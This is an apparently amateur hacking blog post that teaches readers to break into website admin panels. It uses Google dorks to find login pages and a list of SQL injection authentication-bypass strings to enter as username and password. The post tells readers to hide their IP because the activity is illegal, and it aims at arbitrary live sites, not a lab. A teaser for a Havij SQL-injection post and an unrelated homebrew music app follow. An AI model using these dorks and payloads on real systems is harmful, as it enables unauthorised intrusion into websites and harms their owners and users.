HOW: Hacking Admin Panel Using SQL Injection

-


Good Day Blogger!

Today we will hack Admin Panel for website's that are vulnerable to SQL injection. For those who are new to Hacking Websites SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. So lets start hacking!

 NOTE: Website hacking is illegal so hide your IP addresse or use proxy servers. 

First we search for a possible vulnerable site, we use google dorks to search for it.
 So you just try pasting one of the code below and hit search.

GOOGLE DORKS:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

After we select any website. Then we will be directed to the Admin Log in page.
So in the username and password field we insert the SQL injection queries.

 EXAMPLE:
                        User: 1'or'1'='1
                   Password: 1'or'1'='1 

If the first query don't work try some other queries below.

‘ or 1=1 –                                ‘ or ‘x’='x
1'or’1'=’1                                ” or “x”=”x
admin’–                                   ‘) or (‘x’='x
” or 0=0 –                                ‘ or 1=1–
or 0=0 –                                    or 1=1–
‘ or 0=0 #                                  ” or 1=1–
” or 0=0 #                                  ‘ or a=a–
  or 0=0 #                                    “) or (“a”=”a                          
” or “a”=”a                                 ‘) or (‘a’='a
hi” or “a”=”a                               hi”) or (“a”=”)
hi” or 1=1 –                                 hi’) or (‘a’='a
hi’ or 1=1 –                                  hi’ or ‘a’='a

That's all you have to do, If nothing works for you then that website is not vulnerable to SQL injection. Just try searching for other website using the dorks.

 I Hope you like my post, happy hacking :D
 

-byruz



 


Popular posts from this blog

How: Hack Websites Using Havij

-
Image
Hey blogger, Stormy weather here in the Philippines. Due to tropical storm Hagupit or locally named Ruby. But today we will not be talking about literal storms but how we can possibly be a dangerous storm to the web. here is a powerful tool for injecting sql to a website. I'm talking about Havij. you can download Havij on the link below. First we need to find a vulnerable webpage/s we can use this google dorks to find this pages. Below is a list of google doeks you can use to search for possible vulnerable webpages. Link: http://www.cometohack.com/2014/05/5000-fresh-google-dorks-list-for-sql_7713.html After we have chosen a victim page we now try to test if it is vulnerable to SQL injection. we put a single quote ( ' ) to the end of the pages url. like the example below ex. http://www.victim.com/accinfo.php?cartId=2 ' <= here we add the single quote. If errors are shown in the page like sql error or something changes in the webpage then the page is vulner...
Read more

Qmixer v1.0

-
Image
If DJ Max Portable and Timbaland's Beaterator ain't your thing, why not try Qarl & Soulless' QMixer, a homebrew app that gives you the basic functions of a turntable, with features almost similar to Virtual DJ. Feature list: MP3 File Browser for all MS, always visible and quick handling. Load two way simultaneous tracks (one in each plate). Individual volume control for each track. Crossfader. Control playback for each track individually. Play/Pause And Stop. Visual indicators that show the status: Stop-buttons and Play / Pause illuminated. Plates rotating depending on the state of the track. Level indicators of volume of each track. Crossfader status indicator. Name-indicator loaded tracks. Possibility to replace the sound effects: "Just put the desired effects in the folder "effects" with the name of the button when you want it play. The buttons are limited to: ▲, ■, x and o. "The effects must be in wav format with a speed Trans...
Read more